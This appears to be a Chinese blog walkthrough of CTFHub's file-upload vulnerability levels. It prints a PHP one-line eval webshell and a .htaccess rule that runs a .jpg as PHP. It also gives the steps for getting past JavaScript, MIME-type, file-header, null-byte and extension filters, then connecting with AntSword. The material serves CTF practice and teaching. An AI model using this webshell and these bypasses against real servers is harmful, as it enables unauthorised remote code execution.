CTFhup文件上传漏洞练习

发布于:2022-12-16 ⋅ 阅读:(169) ⋅ 点赞:(0)

第一关_无验证

看标题我们知道,直接写一句话木马

<?php  @eval($_POST['1']);?>

然后上传shell

 

 发现上传成功我们用中国蚁🗡连接一下上传的shell地址

第二关_js验证

我们上传一个正常图片试试,发现上传成功

我们再上传一个shell试试,发现上传不了

 我们可以尝试在浏览器设置里面把js关了

 我们再上传一个shell,发现可以成功上传

 

 我们再在中国蚁🗡上面写上shell地址和shell里面的值

 第三关_MIME绕过

我们先上传一个正常的图片发现可以上传,我们再试试上传一个shell,发现上传不了

 我们试试用bp抓包,改一下里面的Content-Type:的值

 改成这三种,其中一种

image/jpeg

 

image/gif
image/png

再发包,发现上传成功了,中国蚁🗡连接成功了

第四关_.htaccess

直接写一个htaccess代码

<FilesMatch "22.jpg">
setHandler application/x-httpd-php
</FilesMatch>

上传htaccess文件

 再写一个shelll ,把它复制的一个图片里面

<?php  @eval($_POST['1']);?>

像这样在cmd 里面写 

 

 再先上传23.jpg,发现上传成功

 第五关_文件头检查

上传22.jpg 跟第四关的22.jpg一样,再bp抓包,修改后缀为php

 发现上传成功

第六关_00截断

上传一个shell发现只能用 jpg png gif 

上传一个shell.php用bp抓包,修改这个

 发现上传成功但是没有路径,但是我们记得路径是这个

http://challenge-c60015bfd263f536.sandbox.ctfhub.com:10800/upload/shell.php

用中国蚁🗡连接成功

 第七关_双写后缀

上传一个shell.php,抓包修改 成 pphphp

 

用中国蚁🗡发现连接成功